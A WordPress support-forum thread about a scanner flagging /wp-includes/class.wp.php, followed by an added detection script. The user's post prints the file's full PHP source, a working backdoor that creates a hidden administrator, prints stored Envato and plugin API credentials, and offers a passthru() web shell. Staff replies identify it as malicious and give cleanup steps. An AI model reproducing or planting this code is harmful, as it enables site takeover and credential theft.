ERRORS - Suspicious file in Core, among others

Hi, we checked our sites with the wpmudev tools and got the following errors about suspicious files found in core:

https://www.dropbox.com/s/nv08zgsetam0ms9/Screenshot%202017-01-12%2013.26.03.png?dl=0

SUSPICIOUS FILE TYPE ISSUE
class.wp.php
/wp-includes/class.wp.php
WORDPRESS CORE Unknown file in WordPress core

main.class.php
/wp-content/plugins/wp-translator-revolution/classes/main.class.php
OTHER Suspicious function found (Medium)

---
What to do?

  • Predrag Dubajic
    • Support

    Hey Andi,

    Hope you're doing well :slight_smile:

    Reported file, /wp-includes/class.wp.php, is indeed part of the WP installation and it's strange that it's reported on one of your sites.

    Can you check the file code and compare it to the original one from clean WP files and see if there are any differences in code that might be causing this?

    Best regards,
    Predrag

  • Andi
    • The Exporter

    Hi Predrag

    ```php
    <?php error_reporting(0);
    include $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';   // bootstraps WordPress so $wpdb and plugin functions are available
    $table_name = $wpdb->get_blog_prefix();
    $sample = 'a:1:{s:13:"administrator";b:1;}';       // serialized capabilities granting "administrator"
    if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}   // ?ok: liveness check for the backdoor
    // ?awu: inserts a hard-coded administrator account (ID/login 1001010, e-mail t@e.st)
    if( isset($_GET['awu']) ) {
    $wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', 't@e.st', '', '2011-06-07 00:00:00', '', '0', '1001010');");
    $wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');");
    $wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); }
    // ?dwu: removes that user and its capabilities row (the user_level row inserted above is left behind)
    if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE `ID` = 1001010");
    $wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 1001010");}
    // ?e1 / ?e2: print stored plugin credentials (Envato Market token; user_name:api_key of the plugin identified by EWPT_PLUGIN_SLUG)
    if( isset($_GET['e1']) ) { echo '<!-- e1_code -->'; echo esc_html( envato_market()->get_option( 'token' ) ); }
    if( isset($_GET['e2']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo '<!-- e2_code -->'; echo esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key']));}
    // ?console: a web shell form whose cmd parameter is executed with passthru()
    if( isset($_GET['console']) ) {function  MakeSimpleForm() { ?> <form method='GET' action='<?=$_SERVER['PHP_SELF']?>'>
    <input type=text name='cmd'> <input type=submit name='exec' value='ok'> </form> <? } function DoCmd($cmd) { ?>
    <textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br> <? } if ( isset($_REQUEST['exec']) && isset($_REQUEST['cmd']))
    DoCmd($_REQUEST['cmd']); else MakeSimpleForm();}?>
    ```

    For me it looks exactly the same as the one in other installations!

    class.wp.php

    Kind regards
    Andi

  • Predrag Dubajic
    • Support

    Hi Andi,

    I just noticed that the file reported is class.wp.php, while the WP file is actually class-wp.php; sorry I missed this before.
    The class.wp.php is NOT part of WP and is a malicious file that can be used to add unwanted users to your site.

    You should remove that file and check your users to see if there are any unwanted admin users on your site.

    Best regards,
    Predrag

  • Andi
    • The Exporter

    Hmm, but it's interesting that it got detected only on one site and not on another :wink:. I just checked another one and found the same identical file there, but it was not detected by Defender; instead it said everything is OK. Even 3 other sites out of 4! But it only got detected on one!

  • Predrag Dubajic
    • Support

    Hi Andi,

    That's strange. I have just performed a couple of tests on my sites where I created class.wp.php with the code you provided, on both multi and single installations, and with each scan the malicious file was reported.

    Did you try running the scan again, in case the file was created after the previous scan?

    Best regards,
    Predrag

  • Andi
    • The Exporter

    Hi Predrag

    I just came back to the office; no, I haven't tried it again, but on all those other 3 sites the scan was actually run yesterday and again today, and all was green before I moved the file out of the directory.

    It would also be interesting to know what is creating that file.

    We actually have a scheduled task to run those tests, and since Christmas nothing got reported, but then yesterday, after the update to 4.7.1, the notifications appeared; we had also updated all wpmudev plugins on those sites before.

    Kind regards
    Andi

  • Dimitris
    • Support Star

    Hey there Andi,

    hope you're doing good and don't mind me chiming in here! :slight_smile:

    This seems like a suspicious file indeed!
    Please follow these next steps so you can better defend your site:
    – Make sure you have WordPress, themes and plugins all updated to the latest stable version.
    – Change your FTP/cPanel password.
    – Compare the number of users you have in (WordPress Dashboard > Users) with those in the “wp_users” database table.
    Reference: https://wordpress.org/support/topic/class-wp-php/#post-8391663

    About the source of it, I wasn't able to locate anything by searching the web.
    I noticed that some users had this file after a WP core update though. :thinking:
    Could you please inform me about that? Are you updating via the WP admin pages or via another portal? If so, what is it? Please advise!

    Warm regards,
    Dimitris
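
The user check that Predrag and Dimitris both recommend (compare Dashboard > Users with the database and look for unwanted admins), as an added example that is not part of this thread: it lists every account whose `{prefix}capabilities` row grants "administrator" and flags the hard-coded values the class.wp.php `?awu` branch writes, plus orphaned usermeta rows. Sample rows are constructed inline in an SQLite stand-in for wp_users/wp_usermeta; the table prefix `wp_` is assumed.

```python
import sqlite3

PREFIX = "wp_"  # assumed table prefix; class.wp.php reads it via $wpdb->get_blog_prefix()
# Constructed sample rows (not real data): a legitimate admin, an editor, the
# account the ?awu branch of class.wp.php inserts (ID/login 1001010, t@e.st),
# and one orphaned usermeta row left behind by an account that was deleted.
USERS = [
    (1, "andi", "andi@example.test", "2016-03-01 09:00:00"),
    (2, "editor", "editor@example.test", "2016-05-10 12:00:00"),
    (1001010, "1001010", "t@e.st", "2011-06-07 00:00:00"),
]
USERMETA = [
    (1, 1, PREFIX + "capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, 2, PREFIX + "capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (1001010, 1001010, PREFIX + "capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (1001011, 1001010, PREFIX + "user_level", "10"),
    (77, 9999, PREFIX + "user_level", "10"),
]

def load(users=USERS, usermeta=USERMETA):
    """Build an in-memory stand-in for the two WordPress tables."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE {PREFIX}users (ID INTEGER PRIMARY KEY, user_login TEXT,
            user_email TEXT, user_registered TEXT);
        CREATE TABLE {PREFIX}usermeta (umeta_id INTEGER PRIMARY KEY,
            user_id INTEGER, meta_key TEXT, meta_value TEXT);""")
    db.executemany(f"INSERT INTO {PREFIX}users VALUES (?,?,?,?)", users)
    db.executemany(f"INSERT INTO {PREFIX}usermeta VALUES (?,?,?,?)", usermeta)
    return db

def admin_accounts(db, prefix=PREFIX):
    """Accounts whose serialized capabilities grant 'administrator'.
    Anything listed here but missing from Dashboard > Users is suspect."""
    return db.execute(f"""
        SELECT u.ID, u.user_login, u.user_email, u.user_registered
        FROM {prefix}users u JOIN {prefix}usermeta m ON m.user_id = u.ID
        WHERE m.meta_key = ? AND m.meta_value LIKE '%"administrator";b:1%'
        ORDER BY u.ID""", (prefix + "capabilities",)).fetchall()

def backdoor_indicators(db, prefix=PREFIX):
    """Admins matching the hard-coded ?awu values, plus orphaned usermeta rows
    (?dwu deletes only user ID 1001010 and umeta_id 1001010, so its user_level row survives)."""
    hits = [("hardcoded-admin", r) for r in admin_accounts(db, prefix)
            if r[0] == 1001010 or r[1] == "1001010" or r[2] == "t@e.st"]
    orphans = db.execute(f"""
        SELECT umeta_id, user_id, meta_key, meta_value FROM {prefix}usermeta
        WHERE user_id NOT IN (SELECT ID FROM {prefix}users)""").fetchall()
    return hits + [("orphan-usermeta", o) for o in orphans]
```

For the file-level comparison Predrag asked for in his first reply, WP-CLI's `wp core verify-checksums` compares wp-admin/ and wp-includes/ against the official checksums for the installed version and warns about files that should not exist there.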
